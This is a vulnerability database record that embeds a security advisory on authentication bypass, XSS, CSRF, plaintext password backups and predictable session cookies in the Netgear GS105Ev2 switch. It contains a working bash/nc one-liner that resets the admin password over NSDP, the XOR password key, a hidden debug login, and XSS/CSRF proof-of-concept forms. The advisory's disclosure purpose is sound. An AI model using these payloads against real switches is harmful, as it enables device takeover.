VAR-201409-0175
Vulnerability from variot - Updated: 2025-04-12 23:24The NETGEAR ProSafe Plus Configuration Utility creates configuration backup files containing cleartext passwords, which might allow remote attackers to obtain sensitive information by reading a file. Netgear Provided by ProSafe Plus Configuration Utility Has a function to back up the switch settings. CWE-200: Information Exposure http://cwe.mitre.org/data/definitions/200.htmlA third party who can access the backup file may obtain the device management password. Attackers can exploit vulnerabilities to obtain sensitive information. # Multiple Vulnerabilities - Netgear GS105Ev2
Product
Vendor: Netgear
Model: GS105Ev2
Firmware version: 1.3.0.3,1.4.0.2
Reference: http://downloadcenter.netgear.com/de/product/GS105Ev2#searchResults
Netgear GS105Ev2 is a Gigabit switch with 5 ports targeting SMBs.
Status/Metrics/Identifier
Status: unfixed
CVSS v2 Vector: (AV:A/AC:L/Au:N/C:C/I:C/A:C)
CVSS Score: 8.3
CVE-ID: n/A
The highest risk is represented by the authentication bypass. This is reflected by the score.
Author/Credits
Benedikt Westermann (T\xdcV Rheinland i-sec GmbH)
Authentication bypass in NSDP
The implementation of the NSDP on the GS105Ev2 (and possibly also other switches) is flawed. An attacker with access to the broadcast domain of the switch can bypass the authentication process. This allows the attacker to gain full control of the switch, i.e., he can modify a particular configuration or flash another firmware to the the switch.
Detailed Description of the Vulnerability
The NSDP is a simple stateless protocol. It consists of a header, a trailer, and a body consisting of an array of type-length-value triplets.
The general structure is depicted below.
/---------------------+----------------------\
| 1 byte: version | 1 byte: packet-type |
+---------------------+----------------------+
| 2 bytes: result | 4 bytes: reserved |
+---------------------+----------------------+
| 6 bytes: src mac | 6 byte: dest mac |
+---------------------+----------------------+
| 2 bytes: reserved | 2 bytes: sequence no |
+---------------------+----------------------+
| 4 bytes: signature | 2 bytes: reserved |
+---------------------+----------------------+
| N bytes: TLV | 2 bytes: 0xFFFF |
+---------------------+----------------------/
| 2 bytes: 0x0000 |
\---------------------/
The TLV part is a sequence of type-length-value (TLV) triples. An entry has the following structure:
/----------------+-------------------+---------------\
| 2 bytes: type | 2 bytes: length l| l bytes: data |
\----------------+-------------------+---------------/
Regarding this vulnerability, the following two types are of special importance:
Type 0x0009 - write password Type 0x9400 - unknown, but seems to indicate that no authentication is performed.
By sending the following payload to the port 63322 to the IP of the GS105Ev2 switch, the password is changed to "test".
|version|type|result|reserved |src-mac |dst-mac
01: 03 : 00:00: 00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:
|reserved|Sig. (NSDP) |TLV-type0x9400|TLV-type 0x0009 | Trailer
00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00
Hereby, the following part is of importance: 94:00:00:00:00:09:00:04:3a:11:14:06
The TLV 94:00:00:00 indicates a packet of type 94 with no payload. This followed by the TLV 00:09:00:04:3a:11:14:06. 0x0009 is the type "password change", 0x0004 is the length of the password, and 3a:11:14:06 is the "encrypted" password that is about to be set. The "encryption" of the password is done by XORing the password with the string "NtgrSmartSwitchRock". If the password is longer than the secret, the secret is used again.
In case, the password has successfully be set, the switch replies with the following message: 01:04:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:00:00:00:00
If the message starts with this prefix 01:04:00:00, the password was changed successfully. This enables an attacker to gain access to the following configuration interfaces: - Web interface HTTP:///login.cgi - Webinterface http:///loginhidden.cgi with user: Admin1NtgrDebugUser (e.g.: - http:///bootcode_update.cgi - http:///produce_burn.cgi ) - Netgear Configuration utility
With this, the configuration can be changed, e.g., enabling a monitoring port, or flashing a new firmware.
The following bash script can be used to change the password to test:
echo "Please enter IP of switch:"; read ip; echo "";echo "Please enter MAC of switch (e.g. de:ad:de:ad:be:ef) :"; read mac; echo "01:03:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00" | sed "s/c0:ff:d4:ba:61:fc/$mac/g;s/://g" | xxd -r -p | nc -q 0 -b -u $ip 63322
For a switch with the IP 192.168.0.239 and the MAC c0:ff:d4:ba:61:fc, the output (and input) would look like this:
Please enter IP of switch:
192.168.0.239
Please enter MAC of switch (e.g. de:ad:de:ad:be:ef) :
c0:ff:d4:ba:61:fc
If the password is not changed, reboot the switch as this little bash script does not regard the SEQ number.
It should be noted that the authentication bypass is not limited to the "set password" function. Other write functions are also affected by this vulnerability.
Please note that the "encryption" scheme for the password is broken. The encryption string can easily be recovered by a simple XOR operation on a known password (NtgrSmartSwitchRock). Thus, an attacker within the broadcast domain can eavesdrop and decode the password. This fact was already noted in [Security by Obscurity bei Netgear Switches].
[Security by Obscurity bei Netgear Switches]: - http://www.linux-magazin.de/Blogs/Insecurity-Bulletin/Gastbeitrag-Security-by-Obscurity-bei-Netgear-Switches
Multiple Vulnerabilities in Web-Interface
Though we did not perform a full analysis of the web interface, we noticed that the web interface is prone to several vulnerabilities, i.e., XSS, CSRF, and insufficient protection of the password.
Detailed Description of the Vulnerabilities
XSS
We noticed that the web interface does not properly encode the output. This allows reflected Cross-Site Scripting attacks. The issue can be reproduced with the following request:
POST /switch_info.cgi HTTP/1.1
Host: 192.168.0.239
Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
switch_name='onclick=alert(1)&dhcpMode=0&ip_address='><Script>alert(&subnet_mask=1)</script>'&gateway_address=
Alternatively, the following HTML-document can be opened to trigger the XSS.
<html>
<body>
<form action="http://192.168.0.239/switch_info.cgi" method="POST">
<input type="hidden" name="switch_name" value="Blubb" />
<input type="hidden" name="dhcpMode" value="0" />
<input type="hidden" name="ip_address" value="'><Script>alert(" />
<input type="hidden" name="subnet_mask" value="1)</script>'" />
<input type="hidden" name="gateway_address" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The following fields are affected: IP-Adresse, Netmask, Gateway Address.
CSRF
In addition, the web application has no protection against Cross-Site request forgery attacks. With the following PoC, the problem can be reproduced:
<html>
<body>
<form action="http://192.168.0.239/switch_info.cgi" method="POST">
<input type="hidden" name="switch_name" value="CSRF" />
<input type="hidden" name="dhcpMode" value="0" />
<input type="hidden" name="ip_address" value="192.168.0.239" />
<input type="hidden" name="subnet_mask" value="255.255.255.0" />
<input type="hidden" name="gateway_address" value="192.168.0.1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Password Disclosure
Moreover, the backup file of the configuration stores the password in plain, when the web interface is used to create the configuration (fixed with 1.4.0.2). The password, secretPass, is stored in plaintext in the configuration file:
hexdump -C GS105Ev2.cfg
00000000 23 79 23 79 00 c0 a8 00 ef ff ff ff 00 c0 a8 00 |#y#y............|
00000010 01 00 00 00 00 00 00 61 64 6d 69 6e 00 00 00 00 |.......admin....|
00000020 73 65 63 72 65 74 50 61 73 73 00 00 00 00 00 00 |secretPass......|
00000030 00 00 00 00 00 00 0f ff f8 00 0f ff f8 00 0f ff |................|
00000040 f8 00 0f ff f8 00 0f ff f8 00 0f ff f8 00 0f ff |................|
CVE-2014-4864 describes the problem for the NSDP protocol.
Predictable Cookies
Another issue is represented by the session ID which seems to be predictable and related to uptime of the switch. After the first login within a minute after power-on, the following session id is set by the switch. For each new login request, the switch was disconnected from the power supply and reconnected. After some time, the ID changes again.
Request 1
POST /login.cgi HTTP/1.1
Host: 192.168.0.239
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
password=test
Response 1
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/
Content-Length: 3454
Request 2
POST /login.cgi HTTP/1.1
Host: 192.168.0.239
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
password=walla
Response 2
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/
Content-Length: 3454
Request 3
POST /login.cgi HTTP/1.1
Host: 192.168.0.239
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
password=secretPass
Response 3
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Set-Cookie: SID=EwTVdG\BCCCo\fNUhte]iXsr_psjq^hNdwr\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/
Content-Length: 3454
Fixed Versions
No updates are currently available.
Password Disclosure: Fixed in version 1.4.0.2
History
10.08.2015 - Initial contact to Netgear via support chat 10.08.2015 - Set preliminary disclosure date 11.08.2015 - Netgear Support confirms findings 01.09.2015 - Netgear Support informs that currently no immediate plans exist to fix the issues 27.01.2016 - Public disclosure
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201409-0175",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prosafe",
"scope": "lte",
"trust": 1.0,
"vendor": "netgear",
"version": "6.1.0.12"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netgear",
"version": null
},
{
"model": "prosafe plus configuration utility",
"scope": null,
"trust": 0.8,
"vendor": "net gear",
"version": null
},
{
"model": "fs116e prosafe plus",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "jfs524e prosafe plus",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "gs105e prosafe plus",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "gs108e prosafe plus",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "gs108pe prosafe plus",
"scope": null,
"trust": 0.6,
"vendor": "netgear",
"version": null
},
{
"model": "prosafe",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "6.1.0.12"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:prosafe_plus_configuration_utility",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CERT/CC",
"sources": [
{
"db": "BID",
"id": "69666"
}
],
"trust": 0.3
},
"cve": "CVE-2014-4864",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2014-4864",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "ADJACENT NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 2.9,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "PARTIAL",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 2.0,
"exploitability": "FUNCTIONAL",
"exploitabilityScore": 5.5,
"id": "CVE-2014-4864",
"impactScore": 2.9,
"integrityImpact": "NONE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "UNAVAILABLE",
"reportConfidence": "CONFIRMED",
"severity": "LOW",
"targetDistribution": "MEDIUM",
"trust": 0.8,
"userInteractionRequired": null,
"vector_string": "AV:A/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "None",
"baseScore": 2.9,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2014-004071",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-05497",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "VHN-72805",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-4864",
"trust": 1.0,
"value": "LOW"
},
{
"author": "NVD",
"id": "CVE-2014-4864",
"trust": 0.8,
"value": "LOW"
},
{
"author": "IPA",
"id": "JVNDB-2014-004071",
"trust": 0.8,
"value": "Low"
},
{
"author": "CNVD",
"id": "CNVD-2014-05497",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201409-457",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-72805",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-457"
},
{
"db": "NVD",
"id": "CVE-2014-4864"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The NETGEAR ProSafe Plus Configuration Utility creates configuration backup files containing cleartext passwords, which might allow remote attackers to obtain sensitive information by reading a file. Netgear Provided by ProSafe Plus Configuration Utility Has a function to back up the switch settings. CWE-200: Information Exposure http://cwe.mitre.org/data/definitions/200.htmlA third party who can access the backup file may obtain the device management password. Attackers can exploit vulnerabilities to obtain sensitive information. # Multiple Vulnerabilities - Netgear GS105Ev2\n\n\n## Product\n\nVendor: Netgear\n\nModel: GS105Ev2\n\nFirmware version: 1.3.0.3,1.4.0.2\n\nReference: http://downloadcenter.netgear.com/de/product/GS105Ev2#searchResults\n\nNetgear GS105Ev2 is a Gigabit switch with 5 ports targeting SMBs. \n\n\n## Status/Metrics/Identifier\n\nStatus: unfixed \n\nCVSS v2 Vector: (AV:A/AC:L/Au:N/C:C/I:C/A:C)\n\nCVSS Score: 8.3\n\nCVE-ID: n/A\n\nThe highest risk is represented by the authentication bypass. This is reflected by the score. \n\n## Author/Credits\n\nBenedikt Westermann (T\\xdcV Rheinland i-sec GmbH)\n\n\n## Authentication bypass in NSDP\n\nThe implementation of the NSDP on the GS105Ev2 (and possibly also other switches) is flawed. An attacker with access to the broadcast domain of the switch can bypass\nthe authentication process. This allows the attacker to gain full control of the switch, i.e., he can modify a particular configuration or flash another firmware to the \nthe switch. \n\n\n### Detailed Description of the Vulnerability\n\nThe NSDP is a simple stateless protocol. It consists of a header, a trailer, and a body consisting of an array of type-length-value triplets. \n\nThe general structure is depicted below. \n\n\t/---------------------+----------------------\\\n\t| 1 byte: version | 1 byte: packet-type | \n\t+---------------------+----------------------+\n\t| 2 bytes: result | 4 bytes: reserved |\n\t+---------------------+----------------------+\n\t| 6 bytes: src mac | 6 byte: dest mac |\n\t+---------------------+----------------------+\n\t| 2 bytes: reserved | 2 bytes: sequence no |\n \t+---------------------+----------------------+\n\t| 4 bytes: signature | 2 bytes: reserved |\n\t+---------------------+----------------------+\t\n\t| N bytes: TLV | 2 bytes: 0xFFFF | \n\t+---------------------+----------------------/\n\t| 2 bytes: 0x0000 |\n\t\\---------------------/\n\nThe TLV part is a sequence of type-length-value (TLV) triples. An entry has the following structure:\n\n\t/----------------+-------------------+---------------\\\n\t| 2 bytes: type | 2 bytes: length l| l bytes: data |\n\t\\----------------+-------------------+---------------/\n\nRegarding this vulnerability, the following two types are of special importance:\n\nType 0x0009 - write password\nType 0x9400 - unknown, but seems to indicate that no authentication is performed. \n\nBy sending the following payload to the port 63322 to the IP of the GS105Ev2 switch, the password is changed to \"test\". \n\n\t|version|type|result|reserved |src-mac |dst-mac \n\t 01: 03 : 00:00: 00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:\n\t\n\t|reserved|Sig. (NSDP) |TLV-type0x9400|TLV-type 0x0009 | Trailer \n\t 00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00\n\nHereby, the following part is of importance:\n\t94:00:00:00:00:09:00:04:3a:11:14:06\n\nThe TLV 94:00:00:00 indicates a packet of type 94 with no payload. This followed by the TLV 00:09:00:04:3a:11:14:06. 0x0009 is the type \"password change\", 0x0004 is\nthe length of the password, and 3a:11:14:06 is the \"encrypted\" password that is about to be set. The \"encryption\" of the password is done by XORing the password with \nthe string \"NtgrSmartSwitchRock\". If the password is longer than the secret, the secret is used again. \n\nIn case, the password has successfully be set, the switch replies with the following message:\n\t01:04:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:00:00:00:00\n\nIf the message starts with this prefix 01:04:00:00, the password was changed successfully. This enables an attacker to gain access to the following configuration interfaces:\n- Web interface HTTP://\u003cip-of-switch\u003e/login.cgi\n- Webinterface http://\u003cip-of-switch\u003e/loginhidden.cgi with user: Admin1NtgrDebugUser (e.g.:\n - http://\u003cip-of-switch\u003e/bootcode_update.cgi\n - http://\u003cip-of-switch\u003e/produce_burn.cgi )\n- Netgear Configuration utility\n\nWith this, the configuration can be changed, e.g., enabling a monitoring port, or flashing a new firmware. \n\nThe following bash script can be used to change the password to test:\n\n\techo \"Please enter IP of switch:\"; read ip; echo \"\";echo \"Please enter MAC of switch (e.g. de:ad:de:ad:be:ef) :\"; read mac; echo \"01:03:00:00:00:00:00:00:3c:97:0e:ee:98:eb:c0:ff:d4:ba:61:fc:00:00:00:78:4e:53:44:50:94:00:00:00:00:09:00:04:3a:11:14:06:ff:ff:00:00\" | sed \"s/c0:ff:d4:ba:61:fc/$mac/g;s/://g\" | xxd -r -p | nc -q 0 -b -u $ip 63322\n\n\nFor a switch with the IP 192.168.0.239 and the MAC c0:ff:d4:ba:61:fc, the output (and input) would look like this:\n\n\tPlease enter IP of switch:\n\t192.168.0.239\n\n\tPlease enter MAC of switch (e.g. de:ad:de:ad:be:ef) :\n\tc0:ff:d4:ba:61:fc\n\nIf the password is not changed, reboot the switch as this little bash script does not regard the SEQ number. \n\nIt should be noted that the authentication bypass is not limited to the \"set password\" function. Other write functions are also affected by this vulnerability. \n\nPlease note that the \"encryption\" scheme for the password is broken. The encryption string can easily be recovered by a simple XOR operation on a known password (NtgrSmartSwitchRock). Thus, an attacker within the broadcast domain can eavesdrop and decode the password. This fact was already noted in [Security by Obscurity bei Netgear Switches]. \n\n[Security by Obscurity bei Netgear Switches]: - http://www.linux-magazin.de/Blogs/Insecurity-Bulletin/Gastbeitrag-Security-by-Obscurity-bei-Netgear-Switches \n\n\n## Multiple Vulnerabilities in Web-Interface\n\nThough we did not perform a full analysis of the web interface, we noticed that the web interface is prone to several vulnerabilities, i.e., XSS, CSRF, and insufficient protection of the password. \n\n\n### Detailed Description of the Vulnerabilities\n\n#### XSS\n\nWe noticed that the web interface does not properly encode the output. This allows reflected Cross-Site Scripting attacks. The issue can be reproduced with the following request:\n\n\tPOST /switch_info.cgi HTTP/1.1\n\tHost: 192.168.0.239\n\tCookie: SID=EwTVdG\\BCCCo\\fNUhte]iXsr_psjq^hNdwr\\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH\n\tContent-Type: application/x-www-form-urlencoded\n\tContent-Length: 110\n\n\tswitch_name=\u0027onclick=alert(1)\u0026dhcpMode=0\u0026ip_address=\u0027\u003e\u003cScript\u003ealert(\u0026subnet_mask=1)\u003c/script\u003e\u0027\u0026gateway_address=\n\nAlternatively, the following HTML-document can be opened to trigger the XSS. \n\n\t\u003chtml\u003e\n\t \u003cbody\u003e\n\t\t\u003cform action=\"http://192.168.0.239/switch_info.cgi\" method=\"POST\"\u003e\n\t\t \u003cinput type=\"hidden\" name=\"switch\u0026#95;name\" value=\"Blubb\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"dhcpMode\" value=\"0\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\"\u0026apos;\u0026gt;\u0026lt;Script\u0026gt;alert\u0026#40;\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\"1\u0026#41;\u0026lt;\u0026#47;script\u0026gt;\u0026apos;\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"gateway\u0026#95;address\" value=\"\" /\u003e\n\t\t \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n\t\t\u003c/form\u003e\n\t \u003c/body\u003e\n\t\u003c/html\u003e\n\nThe following fields are affected: IP-Adresse, Netmask, Gateway Address. \n\n\n#### CSRF\n\nIn addition, the web application has no protection against Cross-Site request forgery attacks. With the following PoC, the problem can be reproduced:\n\n\t\u003chtml\u003e\n\t \u003cbody\u003e\n\t\t\u003cform action=\"http://192.168.0.239/switch_info.cgi\" method=\"POST\"\u003e\n\t\t \u003cinput type=\"hidden\" name=\"switch\u0026#95;name\" value=\"CSRF\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"dhcpMode\" value=\"0\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\"192\u0026#46;168\u0026#46;0\u0026#46;239\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\"255\u0026#46;255\u0026#46;255\u0026#46;0\" /\u003e\n\t\t \u003cinput type=\"hidden\" name=\"gateway\u0026#95;address\" value=\"192\u0026#46;168\u0026#46;0\u0026#46;1\" /\u003e\n\t\t \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n\t\t\u003c/form\u003e\n\t \u003c/body\u003e\n\t\u003c/html\u003e\n\n#### Password Disclosure\n\nMoreover, the backup file of the configuration stores the password in plain, when the web interface is used to create the configuration (fixed with 1.4.0.2). The password, secretPass, is stored in plaintext in the configuration file:\n \n\thexdump -C GS105Ev2.cfg\n\t00000000 23 79 23 79 00 c0 a8 00 ef ff ff ff 00 c0 a8 00 |#y#y............|\n\t00000010 01 00 00 00 00 00 00 61 64 6d 69 6e 00 00 00 00 |.......admin....|\n\t00000020 73 65 63 72 65 74 50 61 73 73 00 00 00 00 00 00 |secretPass......|\n\t00000030 00 00 00 00 00 00 0f ff f8 00 0f ff f8 00 0f ff |................|\n\t00000040 f8 00 0f ff f8 00 0f ff f8 00 0f ff f8 00 0f ff |................|\n\nCVE-2014-4864 describes the problem for the NSDP protocol. \n\n\n#### Predictable Cookies\n\nAnother issue is represented by the session ID which seems to be predictable and related to uptime of the switch. After the first login within a minute after power-on, the following session id is set by the switch. For each new login request, the switch was disconnected from the power supply and reconnected. After some time, the ID changes again. \n\n\n##### Request 1\n\n\tPOST /login.cgi HTTP/1.1\n\tHost: 192.168.0.239\n\tContent-Type: application/x-www-form-urlencoded\n\tContent-Length: 13\n\n\tpassword=test\n\n\n##### Response 1\n\n\n\tHTTP/1.1 200 OK\n\tConnection: close\n\tContent-Type: text/html\n\tSet-Cookie: SID=EwTVdG\\BCCCo\\fNUhte]iXsr_psjq^hNdwr\\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/\n\tContent-Length: 3454\n\n##### Request 2\n\n\tPOST /login.cgi HTTP/1.1\n\tHost: 192.168.0.239\n\tContent-Type: application/x-www-form-urlencoded\n\tContent-Length: 13\n\n\tpassword=walla\n\n\n##### Response 2\n\n\tHTTP/1.1 200 OK\n\tConnection: close\n\tContent-Type: text/html\n\tSet-Cookie: SID=EwTVdG\\BCCCo\\fNUhte]iXsr_psjq^hNdwr\\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/\n\tContent-Length: 3454\n\n##### Request 3\n\n\tPOST /login.cgi HTTP/1.1\n\tHost: 192.168.0.239\n\tContent-Type: application/x-www-form-urlencoded\n\tContent-Length: 13\n\n\tpassword=secretPass\n\n\t\n##### Response 3\n\n\tHTTP/1.1 200 OK\n\tConnection: close\n\tContent-Type: text/html\n\tSet-Cookie: SID=EwTVdG\\BCCCo\\fNUhte]iXsr_psjq^hNdwr\\RSXkduf[OXpsveZAeyIp_xx[wFmKdp_ijDDqABZrjlBH;PATH=/\n\tContent-Length: 3454\n\n\n\t\n## Fixed Versions\n\nNo updates are currently available. \n\nPassword Disclosure:\nFixed in version 1.4.0.2\n\n\n## History\n\n10.08.2015 - Initial contact to Netgear via support chat\n10.08.2015 - Set preliminary disclosure date\n11.08.2015 - Netgear Support confirms findings\n01.09.2015 - Netgear Support informs that currently no immediate plans exist to fix the issues\n27.01.2016 - Public disclosure\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-4864"
},
{
"db": "CERT/CC",
"id": "VU#396212"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004071"
},
{
"db": "CNVD",
"id": "CNVD-2014-05497"
},
{
"db": "BID",
"id": "69666"
},
{
"db": "VULHUB",
"id": "VHN-72805"
},
{
"db": "PACKETSTORM",
"id": "135480"
}
],
"trust": 3.33
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/396212",
"trust": 0.8,
